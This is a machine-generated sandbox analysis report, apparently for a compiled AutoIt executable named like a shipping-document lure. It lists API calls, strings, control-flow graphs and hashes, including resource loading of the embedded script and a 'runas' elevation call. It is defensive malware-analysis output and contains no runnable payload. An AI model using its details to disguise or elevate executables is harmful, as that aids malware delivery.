                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00933C6F
                                                                • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,009E7770,00000010), ref: 0096D281
                                                                • SetCurrentDirectoryW.KERNEL32(?,009F52F8,?,?,?), ref: 0096D2B9
                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,009E4260,009F52F8,?,?,?), ref: 0096D33F
                                                                • ShellExecuteW.SHELL32(00000000,?,?), ref: 0096D346
                                                                  • Part of subcall function 00933A46: GetSysColorBrush.USER32(0000000F), ref: 00933A50
                                                                  • Part of subcall function 00933A46: LoadCursorW.USER32(00000000,00007F00), ref: 00933A5F
                                                                  • Part of subcall function 00933A46: LoadIconW.USER32(00000063), ref: 00933A76
                                                                  • Part of subcall function 00933A46: LoadIconW.USER32(000000A4), ref: 00933A88
                                                                  • Part of subcall function 00933A46: LoadIconW.USER32(000000A2), ref: 00933A9A
                                                                  • Part of subcall function 00933A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00933AC0
                                                                  • Part of subcall function 00933A46: RegisterClassExW.USER32(?), ref: 00933B16
                                                                  • Part of subcall function 009339D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00933A03
                                                                  • Part of subcall function 009339D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00933A24
                                                                  • Part of subcall function 009339D5: ShowWindow.USER32(00000000,?,?), ref: 00933A38
                                                                  • Part of subcall function 009339D5: ShowWindow.USER32(00000000,?,?), ref: 00933A41
                                                                  • Part of subcall function 0093434A: _memset.LIBCMT ref: 00934370
                                                                  • Part of subcall function 0093434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00934415
                                                                Strings
                                                                • This is a third-party compiled AutoIt script., xrefs: 0096D279
                                                                • runas, xrefs: 0096D33A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                • String ID: This is a third-party compiled AutoIt script.$runas
                                                                • API String ID: 529118366-3287110873
                                                                • Opcode ID: a802d5dc1d2721991cedb342e4e90010535127f52da51ec3153e80a051a8c201
                                                                • Instruction ID: f7bc44484bd458d872dbf4d18cfeb180144c8d0cdff7e87dd3a158560eb1445d
                                                                • Opcode Fuzzy Hash: a802d5dc1d2721991cedb342e4e90010535127f52da51ec3153e80a051a8c201
                                                                • Instruction Fuzzy Hash: 2751E670E58248AECF11EBF4DC15EFDBBB8AF85750F008265FA71A6161CA704A45EF21
                                                                Function 009349A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 996 9349a0-934a00 call 937667 GetVersionExW call 937bcc 1001 934a06 996->1001 1002 934b0b-934b0d 996->1002 1003 934a09-934a0e 1001->1003 1004 96d767-96d773 1002->1004 1006 934b12-934b13 1003->1006 1007 934a14 1003->1007 1005 96d774-96d778 1004->1005 1008 96d77a 1005->1008 1009 96d77b-96d787 1005->1009 1010 934a15-934a4c call 937d2c call 937726 1006->1010 1007->1010 1008->1009 1009->1005 1011 96d789-96d78e 1009->1011 1019 934a52-934a53 1010->1019 1020 96d864-96d867 1010->1020 1011->1003 1013 96d794-96d79b 1011->1013 1013->1004 1015 96d79d 1013->1015 1018 96d7a2-96d7a5 1015->1018 1021 934a93-934aaa GetCurrentProcess IsWow64Process 1018->1021 1022 96d7ab-96d7c9 1018->1022 1019->1018 1023 934a59-934a64 1019->1023 1024 96d880-96d884 1020->1024 1025 96d869 1020->1025 1032 934aaf-934ac0 1021->1032 1033 934aac 1021->1033 1022->1021 1026 96d7cf-96d7d5 1022->1026 1027 934a6a-934a6c 1023->1027 1028 96d7ea-96d7f0 1023->1028 1030 96d886-96d88f 1024->1030 1031 96d86f-96d878 1024->1031 1029 96d86c 1025->1029 1036 96d7d7-96d7da 1026->1036 1037 96d7df-96d7e5 1026->1037 1038 934a72-934a75 1027->1038 1039 96d805-96d811 1027->1039 1040 96d7f2-96d7f5 1028->1040 1041 96d7fa-96d800 1028->1041 1029->1031 1030->1029 1042 96d891-96d894 1030->1042 1031->1024 1034 934ac2-934ad2 call 934b37 1032->1034 1035 934b2b-934b35 GetSystemInfo 1032->1035 1033->1032 1053 934ad4-934ae1 call 934b37 1034->1053 1054 934b1f-934b29 GetSystemInfo 1034->1054 1048 934af8-934b08 1035->1048 1036->1021 1037->1021 1046 96d831-96d834 1038->1046 1047 934a7b-934a8a 1038->1047 1043 96d813-96d816 1039->1043 1044 96d81b-96d821 1039->1044 1040->1021 1041->1021 1042->1031 1043->1021 1044->1021 1046->1021 1050 96d83a-96d84f 1046->1050 1051 96d826-96d82c 1047->1051 1052 934a90 1047->1052 1055 96d851-96d854 1050->1055 1056 96d859-96d85f 1050->1056 1051->1021 1052->1021 1061 934ae3-934ae7 GetNativeSystemInfo 1053->1061 1062 934b18-934b1d 1053->1062 1058 934ae9-934aed 1054->1058 1055->1021 1056->1021 1058->1048 1060 934aef-934af2 FreeLibrary 1058->1060 1060->1048 1061->1058 1062->1061
                                                                APIs
                                                                • GetVersionExW.KERNEL32(?), ref: 009349CD
                                                                  • Part of subcall function 00937BCC: _memmove.LIBCMT ref: 00937C06
                                                                • GetCurrentProcess.KERNEL32(?,009BFAEC,00000000,00000000,?), ref: 00934A9A
                                                                • IsWow64Process.KERNEL32(00000000), ref: 00934AA1
                                                                • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00934AE7
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00934AF2
                                                                • GetSystemInfo.KERNEL32(00000000), ref: 00934B23
                                                                • GetSystemInfo.KERNEL32(00000000), ref: 00934B2F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                • String ID:
                                                                • API String ID: 1986165174-0
                                                                • Opcode ID: 5b0843806e276afbd1712621ee7ee63d478defcb8c9d5480c35da57872c97750
                                                                • Instruction ID: dd89ae94d8056a340de094ee06c233d20fa52d28c94a601527e0c1b1429e0067
                                                                • Opcode Fuzzy Hash: 5b0843806e276afbd1712621ee7ee63d478defcb8c9d5480c35da57872c97750
                                                                • Instruction Fuzzy Hash: F091D53198E7C4DECB31CB6885541AAFFF9AF2A300F444E6ED0D793A41D224B508DB5A
                                                                Function 00934E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1063 934e89-934ea1 CreateStreamOnHGlobal 1064 934ea3-934eba FindResourceExW 1063->1064 1065 934ec1-934ec6 1063->1065 1066 934ec0 1064->1066 1067 96d933-96d942 LoadResource 1064->1067 1066->1065 1067->1066 1068 96d948-96d956 SizeofResource 1067->1068 1068->1066 1069 96d95c-96d967 LockResource 1068->1069 1069->1066 1070 96d96d-96d98b 1069->1070 1070->1066
                                                                APIs
                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00934D8E,?,?,00000000,00000000), ref: 00934E99
                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00934D8E,?,?,00000000,00000000), ref: 00934EB0
                                                                • LoadResource.KERNEL32(?,00000000,?,?,00934D8E,?,?,00000000,00000000,?,?,?,?,?,?,00934E2F), ref: 0096D937
                                                                • SizeofResource.KERNEL32(?,00000000,?,?,00934D8E,?,?,00000000,00000000,?,?,?,?,?,?,00934E2F), ref: 0096D94C
                                                                • LockResource.KERNEL32(00934D8E,?,?,00934D8E,?,?,00000000,00000000,?,?,?,?,?,?,00934E2F,00000000), ref: 0096D95F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                • String ID: SCRIPT
                                                                • API String ID: 3051347437-3967369404
                                                                • Opcode ID: 9c0393dee053a5f2b4747424107359e90fdaf223841b29706393c927a7be7e0a
                                                                • Instruction ID: 941de4818eebb791b8b7d35c9ab3bc933e2714f58267efae7e23d803a3865655
                                                                • Opcode Fuzzy Hash: 9c0393dee053a5f2b4747424107359e90fdaf223841b29706393c927a7be7e0a
                                                                • Instruction Fuzzy Hash: BC115A79240700BFD7258B65ED58F677BBEFBC5B21F21426CF416D6250DB61EC009A60
                                                                Function 0093FCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: BuffCharUpper
                                                                • String ID:
                                                                • API String ID: 3964851224-0
                                                                • Opcode ID: d8f27eae2d20d8c0382790a727a7ff5df0d00e319f75b56574488b61bc6a01b9
                                                                • Instruction ID: be88eebeed6ba68e88928e0b9d5ddca03afc1cb9e093adbe7f175d3948809ae3
                                                                • Opcode Fuzzy Hash: d8f27eae2d20d8c0382790a727a7ff5df0d00e319f75b56574488b61bc6a01b9
                                                                • Instruction Fuzzy Hash: 4A9247716083418FD724DF28C480B2ABBE5BFC9304F14896DE99A9B262D775EC45CB92
                                                                Function 009347D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • IsThemeActive.UXTHEME ref: 00934834
                                                                  • Part of subcall function 0095336C: __lock.LIBCMT ref: 00953372
                                                                  • Part of subcall function 0095336C: DecodePointer.KERNEL32(00000001,?,00934849,00987C74), ref: 0095337E
                                                                  • Part of subcall function 0095336C: EncodePointer.KERNEL32(?,?,00934849,00987C74), ref: 00953389
                                                                  • Part of subcall function 009348FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00934915
                                                                  • Part of subcall function 009348FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0093492A
                                                                  • Part of subcall function 00933B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00933B68
                                                                  • Part of subcall function 00933B3A: IsDebuggerPresent.KERNEL32 ref: 00933B7A
                                                                  • Part of subcall function 00933B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,009F52F8,009F52E0,?,?), ref: 00933BEB
                                                                  • Part of subcall function 00933B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00933C6F
                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00934874
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                • String ID: 0`
                                                                • API String ID: 1438897964-672551491
                                                                • Opcode ID: 154d43640959a685727978e8f8b1083f730711e63acceef5f9e50dbf197d6f0f
                                                                • Instruction ID: 33411dc06ed9e83089961d5352273c9ef1cb934f667479b30bc034c3b389a54b
                                                                • Opcode Fuzzy Hash: 154d43640959a685727978e8f8b1083f730711e63acceef5f9e50dbf197d6f0f
                                                                • Instruction Fuzzy Hash: 9B118C719183019BC700EF69EC45A5AFFE8EBC5750F118A1EF550872B1DBB09548DF92
                                                                Function 0099445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,0096E398), ref: 0099446A
                                                                • FindFirstFileW.KERNELBASE(?,?), ref: 0099447B
                                                                • FindClose.KERNEL32(00000000), ref: 0099448B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: FileFind$AttributesCloseFirst
                                                                • String ID:
                                                                • API String ID: 48322524-0
                                                                • Opcode ID: e08ab9f5a5813b4126693c7e6d5ddc9ec05bbbace8e4d6e272dfcb97b65179e1
                                                                • Instruction ID: dd6ec7676f3b4ca4a125e691581e71ca754fd318d99b9113a88140a274690820
                                                                • Opcode Fuzzy Hash: e08ab9f5a5813b4126693c7e6d5ddc9ec05bbbace8e4d6e272dfcb97b65179e1
                                                                • Instruction Fuzzy Hash: FDE0D833424500675A146B3CEC1D8E977DC9E05375F100715F835C11E0E7745900A596
                                                                Function 0093E6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • Variable must be of type 'Object'., xrefs: 00973E62
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Variable must be of type 'Object'.
                                                                • API String ID: 0-109567571
                                                                • Opcode ID: f6be406430470bce12fea3580e3afa271909e43f0a11dc0a15b82175864508d6
                                                                • Instruction ID: 0ad1a8823c0511c7147ad982f91c77836d6a45f2b8393d87e9aab1df6c75299c
                                                                • Opcode Fuzzy Hash: f6be406430470bce12fea3580e3afa271909e43f0a11dc0a15b82175864508d6
                                                                • Instruction Fuzzy Hash: C2A29D75A00209CFCB24CF58C480AAEB7B6FF59314F248459E81AAB391D775ED42CF91
                                                                Function 009409D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00940A5B
                                                                • timeGetTime.WINMM ref: 00940D16
                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00940E53
                                                                • Sleep.KERNEL32(0000000A), ref: 00940E61
                                                                • LockWindowUpdate.USER32(00000000,?,?), ref: 00940EFA
                                                                • DestroyWindow.USER32 ref: 00940F06
                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00940F20
                                                                • Sleep.KERNEL32(0000000A,?,?), ref: 00974E83
                                                                • TranslateMessage.USER32(?), ref: 00975C60
                                                                • DispatchMessageW.USER32(?), ref: 00975C6E
                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00975C82
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                • API String ID: 4212290369-3242690629
                                                                • Opcode ID: bd7f06ec63d2ed271d63a5c10103428df0a78bad12a625ae74c962288f81a5b6
                                                                • Instruction ID: 5a081cfc46a1998f384aaacbebd4e1e79cc29ea4c0927a2d511e8c832c6bf32f
                                                                • Opcode Fuzzy Hash: bd7f06ec63d2ed271d63a5c10103428df0a78bad12a625ae74c962288f81a5b6
                                                                • Instruction Fuzzy Hash: C6B2BE71608741DFD728DF24C884FAAB7E8BFC4304F15891DE59A972A1DBB5E844CB82
                                                                Function 00999155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 00998F5F: __time64.LIBCMT ref: 00998F69
                                                                  • Part of subcall function 00934EE5: _fseek.LIBCMT ref: 00934EFD
                                                                • __wsplitpath.LIBCMT ref: 00999234
                                                                  • Part of subcall function 009540FB: __wsplitpath_helper.LIBCMT ref: 0095413B
                                                                • _wcscpy.LIBCMT ref: 00999247
                                                                • _wcscat.LIBCMT ref: 0099925A
                                                                • __wsplitpath.LIBCMT ref: 0099927F
                                                                • _wcscat.LIBCMT ref: 00999295
                                                                • _wcscat.LIBCMT ref: 009992A8
                                                                  • Part of subcall function 00998FA5: _memmove.LIBCMT ref: 00998FDE
                                                                  • Part of subcall function 00998FA5: _memmove.LIBCMT ref: 00998FED
                                                                • _wcscmp.LIBCMT ref: 009991EF
                                                                  • Part of subcall function 00999734: _wcscmp.LIBCMT ref: 00999824
                                                                  • Part of subcall function 00999734: _wcscmp.LIBCMT ref: 00999837
                                                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00999452
                                                                • _wcsncpy.LIBCMT ref: 009994C5
                                                                • DeleteFileW.KERNEL32(?,?), ref: 009994FB
                                                                • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00999511
                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00999522
                                                                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00999534
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                • String ID:
                                                                • API String ID: 1500180987-0
                                                                • Opcode ID: a39e54633bac58c6ef6235a90154d47d307604111dcbaabb9982128a56446af0
                                                                • Instruction ID: 802dfa859c708f036ac6b0337f6a2363de7f8e896c2241e003ebde27719f1ac0
                                                                • Opcode Fuzzy Hash: a39e54633bac58c6ef6235a90154d47d307604111dcbaabb9982128a56446af0
                                                                • Instruction Fuzzy Hash: 49C12DB1D00219ABDF21DF99CC85ADEB7BDEF95314F0040AAF609E6151EB309A848F65
                                                                Function 0093708B Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 201registryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 00934706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009F52F8,?,009337AE,?), ref: 00934724
                                                                  • Part of subcall function 0095050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00937165), ref: 0095052D
                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 009371A8
                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0096E8C8
                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0096E909
                                                                • RegCloseKey.ADVAPI32(?), ref: 0096E947
                                                                • _wcscat.LIBCMT ref: 0096E9A0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\$hU
                                                                • API String ID: 2673923337-2827554168
                                                                • Opcode ID: cf28ff81d0c37b0ab6bf811e07a5c3e908724235d419371dd0d3641e44a44182
                                                                • Instruction ID: d5395847070131ff6bf92a7b7101b9018e421f3f1f4470dbb9f8ed9e92c8c99b
                                                                • Opcode Fuzzy Hash: cf28ff81d0c37b0ab6bf811e07a5c3e908724235d419371dd0d3641e44a44182
                                                                • Instruction Fuzzy Hash: 67718D715183019EC314EF69EC41AABBBF8FF99350F40492EF495C72A0EB719948DB52
                                                                Function 00933015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71windowregistryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • GetSysColorBrush.USER32(0000000F), ref: 00933074
                                                                • RegisterClassExW.USER32(00000030), ref: 0093309E
                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009330AF
                                                                • InitCommonControlsEx.COMCTL32(?), ref: 009330CC
                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009330DC
                                                                • LoadIconW.USER32(000000A9), ref: 009330F2
                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00933101
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                • API String ID: 2914291525-1005189915
                                                                • Opcode ID: 0d86d7e90410dfc64137b292515b2ca9bc2367b4dbe760b602597b0a33812086
                                                                • Instruction ID: b25d0110208ba40c018cb5eae3d94542b98bd55ba6f7a5de5c12e342a6109a26
                                                                • Opcode Fuzzy Hash: 0d86d7e90410dfc64137b292515b2ca9bc2367b4dbe760b602597b0a33812086
                                                                • Instruction Fuzzy Hash: EF317A71869309AFDB10CFA4EC84ADDBBF0FB08320F14416EE580E62A0D7B40540DF80
                                                                Function 00933A46 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71windowregistryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • GetSysColorBrush.USER32(0000000F), ref: 00933A50
                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00933A5F
                                                                • LoadIconW.USER32(00000063), ref: 00933A76
